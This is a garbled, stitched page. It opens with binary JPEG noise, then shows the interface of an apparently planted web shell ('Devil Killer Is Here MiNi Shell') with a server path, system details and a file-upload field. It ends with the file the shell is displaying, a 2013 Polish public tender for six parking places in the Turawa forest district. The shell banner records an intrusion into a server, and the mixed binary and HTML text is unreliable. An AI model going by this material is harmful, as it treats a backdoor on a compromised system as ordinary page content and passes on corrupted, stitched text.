JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130415/147634-N-2013.html

<p class="kh_header"><b>Turawa: Wykonanie sześciu miejsc postoju pojazdów wraz z projektem i  infrastrukturą towarzyszącą na terenie Nadleśnictwa Turawa</b><br>
<b>Numer ogłoszenia: 147634 - 2013; data zamieszczenia: 15.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowe Gospodarstwo Leśne  Lasy Państwowe Nadleśnictwo Turawa , ul. Opolska 35, 46-045 Turawa, woj. opolskie, tel. 077 4212011, faks 77 4212074.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.lasy.gov.pl/turawa</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka organizacyjna nie piosiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie sześciu miejsc postoju pojazdów wraz z projektem i  infrastrukturą towarzyszącą na terenie Nadleśnictwa Turawa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: - wykonanie sześciu  miejsc postoju pojazdów- dalej MPP wraz  z projektem i zgłoszeniem robót budowlanych oraz montażem dostarczonej infrastruktury towarzyszącej ( na wykonawcy spoczywa odbiór,  przechowywanie, dowóz dostarczonej infrastruktury i montaż) na terenie Nadleśnictwa Turawa zgodnie ze standardami określonymi w  programie: Aktywne udostępnianie lasu na 2013r.
Zakres prac do w6ykonania :
I - MPP Leśnictwo Marszałki działka Nr 145/2 Obręb Turawa Kw. OP10/0009405/5
(załącznik mapowy Nr 1) 
Do wykonania:
1.Wykonanie projektu  MPP wraz z niezbędnymi uzgodnieniami, decyzjami i zezwoleniami wynikającymi również z Prawa Budowlanego,  z wykorzystaniem infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43 i Zamawiającego - (tablice) - złożony wraz z ofertą  UWAGA: Projekt musi zawierać sposób dojazdu do wiaty dla osób niepełnosprawnych
2.Zgłoszenie robót zgodnie z Prawem Budowlanym - zaraz po podpisaniu umowy
3.Odtworzenie istniejącego podłoża oraz uzupełnienie nierówności masą bitumiczną
4.Wyrównanie terenu za krawężnikiem, utwardzenie tłuczniem bazaltowym i mechaniczne zagęszczenie miejsca ustawienia wiaty, stołów i ław zgodnie z terenowymi uzgodnieniami
5.Utwardzenie dojazdu dla niepełnosprawnych
6.Obiór, przechowanie infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43  oraz dostarczenie jej na miejsce MPP w ilości:
a.Wiata szt. 1
b.Stoły szt. 3
c.Ławy szt. 6
d.Kosze na śmieci szt. 4
e.Ogrodzenie mb. 80
f.Tablice informacyjne szt. 4
g.Słupy informacje wraz przymocowaniem tablic szt. 3 
7.Montaż i ustawienie infrastruktury
II - MPP Leśnictwo Rzędów działka Nr 68/202 Obręb Rzędów Kw. 93475
(załącznik mapowy Nr 2) 
Do wykonania:
1.Wykonanie projektu  MPP wraz z niezbędnymi uzgodnieniami, decyzjami i zezwoleniami wynikającymi również z Prawa Budowlanego,  z wykorzystaniem infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43 i Zamawiającego - (tablice) - złożony wraz z ofertą  UWAGA: Projekt musi zawierać sposób dojazdu do wiaty dla osób niepełnosprawnych
2.Zgłoszenie robót zgodnie z Prawem Budowlanym - zaraz po podpisaniu umowy
3.Wykorytowanie i utwardzenie miejsca postoju kamieniem bazaltowym o frakcji 0/63 mm o grubości min. 15 cm  oraz mechaniczne  zagęszczenie podłoża kamieniem bazaltowym o frakcji 0/31,5 mm o grubości min. 3 cm. .  
4.Obiór, przechowanie infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43  oraz dostarczenie jej na miejsce MPP w ilości:
a.Wiata szt. 1
b.Stoły szt. 3
c.Ławy szt. 6
d.Kosze na śmieci szt. 3
e.Ogrodzenie mb. 100
f.Tablice informacyjne szt. 4
g.Słupy informacje wraz przymocowaniem tablic szt. 3 
h.Rogatka szt. 1(zakup przez wykonawcę)
5.Montaż i ustawienie infrastruktury

III - MPP Leśnictwo Kadłub Turawski działka Nr 528 Obręb Biestrzynnik  Kw. OP10/00093473/9
(załącznik mapowy Nr 3) 
Do wykonania:
1.Wykonanie projektu  MPP wraz z niezbędnymi uzgodnieniami, decyzjami i zezwoleniami wynikającymi również z Prawa Budowlanego,  z wykorzystaniem infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43 i Zamawiającego - (tablice) - złożony wraz z ofertą  UWAGA: Projekt musi zawierać sposób dojazdu do wiaty dla osób niepełnosprawnych
2.Zgłoszenie robót zgodnie z Prawem Budowlanym - zaraz po podpisaniu umowy
6.Wyrównanie miejsca istniejącego oraz wykorytowanie i utwardzenie miejsca  postoju  kamieniem bazaltowym o frakcji 0/63 mm o grubości min. 15 cm  oraz mechaniczne  zagęszczenie podłoża kamieniem bazaltowym o frakcji 0/31,5 mm o grubości min. 3 cm. .  
3.Obiór, przechowanie infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43  oraz dostarczenie jej na miejsce MPP w ilości:
a.Wiata szt. 1
b.Stoły szt. 3
c.Ławy szt. 6
d.Kosze na śmieci szt. 4
e.Ogrodzenie mb. 100
f.Tablice informacyjne szt. 2
g.Słupy informacje wraz przymocowaniem tablic szt. 3 
4.Montaż i ustawienie infrastruktury

IV - MPP Leśnictwo Laskowice działka Nr 177 i 178 Obręb Jełowa  Kw. 63538
(załącznik mapowy Nr 4) 
Do wykonania:
1.Wykonanie projektu  MPP wraz z niezbędnymi uzgodnieniami, decyzjami i zezwoleniami wynikającymi również z Prawa Budowlanego,  z wykorzystaniem infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43 i Zamawiającego - (tablice) - złożony wraz z ofertą  UWAGA: Projekt musi zawierać sposób dojazdu do wiaty dla osób niepełnosprawnych
2.Zgłoszenie robót zgodnie z Prawem Budowlanym - zaraz po podpisaniu umowy
3.Wyrównanie miejsca istniejącego  oraz mechaniczne zagęszczenie  podłoża kamieniem bazaltowym o frakcji 0/31.5 o grubości 3 cm.  
4.Obiór, przechowanie infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43  oraz dostarczenie jej na miejsce MPP w ilości:
a. Wiata szt. 1
b. Stoły szt. 3
c. Ławy szt. 6
d.Kosze na śmieci szt. 6
e.Ogrodzenie mb. 150
f.Tablice informacyjne szt. 4
g.Słupy informacje wraz przymocowaniem tablic szt. 5 
h.Montaż ii ustawienie infrastruktury

V - MPP Leśnictwo Dąbrówka działka Nr 223/2 Obręb Dąbrówka Łubniańska  Kw. 100133
(załącznik mapowy Nr 5) 
Do wykonania:
1.Wykonanie projektu  MPP wraz z niezbędnymi uzgodnieniami, decyzjami i zezwoleniami wynikającymi również z Prawa Budowlanego,  z wykorzystaniem infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43 i Zamawiającego - (tablice) - złożony wraz z ofertą  UWAGA: Projekt musi zawierać sposób dojazdu do wiaty dla osób niepełnosprawnych
2.Zgłoszenie robót zgodnie z Prawem Budowlanym - zaraz po podpisaniu umowy
7.Wykorytowanie i utwardzenie miejsca  postoju kamieniem bazaltowym o frakcji 0/63 mm o grubości min. 15 cm  oraz mechaniczne  zagęszczenie podłoża kamieniem bazaltowym o frakcji 0/31,5 mm o grubości min. 3 cm. .  
3.Obiór, przechowanie infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43  oraz dostarczenie jej na miejsce MPP w ilości:
a.Wiata szt. 1
a.Stoły szt. 3
b.Ławy szt. 6
c.Kosze na śmieci szt. 6
d.Ogrodzenie mb. 150
e.Tablice informacyjne szt. 4
f.Słupy informacje wraz przymocowaniem tablic szt. 3 
4.Montaż i ustawienie infrastruktury

VI - MPP Leśnictwo Morcinek działka Nr 47/2 Obręb Dąbrówka Łubniańska  Kw. 100133
(załącznik mapowy Nr 5) 
Do wykonania:
1.Wykonanie projektu  MPP wraz z niezbędnymi uzgodnieniami, decyzjami i zezwoleniami wynikającymi również z Prawa Budowlanego,  z wykorzystaniem infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43 i Zamawiającego - (tablice) - złożony wraz z ofertą  UWAGA: Projekt musi zawierać sposób dojazdu do wiaty dla osób niepełnosprawnych
2.Zgłoszenie robót zgodnie z Prawem Budowlanym - zaraz po podpisaniu umowy
8.Wykorytowanie i utwardzenie miejsca  postoju kamieniem bazaltowym o frakcji 0/63 mm o grubości min. 15 cm  oraz mechaniczne  zagęszczenie podłoża kamieniem bazaltowym o frakcji 0/31,5 mm o grubości min. 3 cm. .  
3.Obiór, przechowanie infrastruktury dostarczonej przez Zespół Składnic L.P. 78-200 Białogard ul. Wojska Polskiego 43  oraz dostarczenie jej na miejsce MPP w ilości:
a.Wiata szt. 1
b.Stoły szt. 3
c.Ławy szt. 6
d.Kosze na śmieci szt. 3
f.Ogrodzenie mb. 50
g.Tablice informacyjne szt. 2 dwóstronne
h.Słupy informacje wraz przymocowaniem tablic szt. 3 
4.Montaż i ustawienie infrastruktury.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 2900,-zł.
Wadium winno być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
a.pieniądzu, przelewem na rachunek bankowy Zamawiającego w banku: BGŻ SA Opole nr12203000451110000000426010; w taki sposób, aby znalazły się na rachunku Zamawiającego w dniu 30.04.2013r. do godz. 09:30
b.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie z kasy jest zawsze poręczeniem pieniężnym;
c.gwarancjach bankowych;
d.gwarancjach ubezpieczeniowych;
e.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 roku o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2007 r. Nr 42, poz. 275, z 2008 r. Nr 116, poz. 730 i 732 i Nr 227, poz. 1505 oraz z 2010 r. Nr 96, poz. 620).
Wadium musi obejmować cały okres związania ofertą.
Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.
Wykonawca, który nie wniesie wadium w formie lub formach, o których mowa w pkt 21.2. SIWZ zostanie wykluczony z postępowania.
Zamawiający dokona niezwłocznie zwrotu wadium po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza. Z zastrzeżeniem, że Zamawiający zatrzyma wadium z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
Zamawiający, dokona niezwłocznie zwrotu wadium, na pisemny wniosek Wykonawcy, który wycofał ofertę przed upływem terminu do składania ofert.
Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizję bankową za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz Zamawiającego w przypadku, gdy:
a.odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b.nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c.zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie na temat wielkości średniego rocznego zatrudnienia u wykonawcy usług lub robót budowlanych oraz liczebności personelu kierowniczego w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a w przypadku gdy okres prowadzenia działalności jest krótszy - w tym okresie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. katowice.lasy.gov.pl/turawa<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PGLLP Nadleśnictwo Turawa
46-045 Turawa
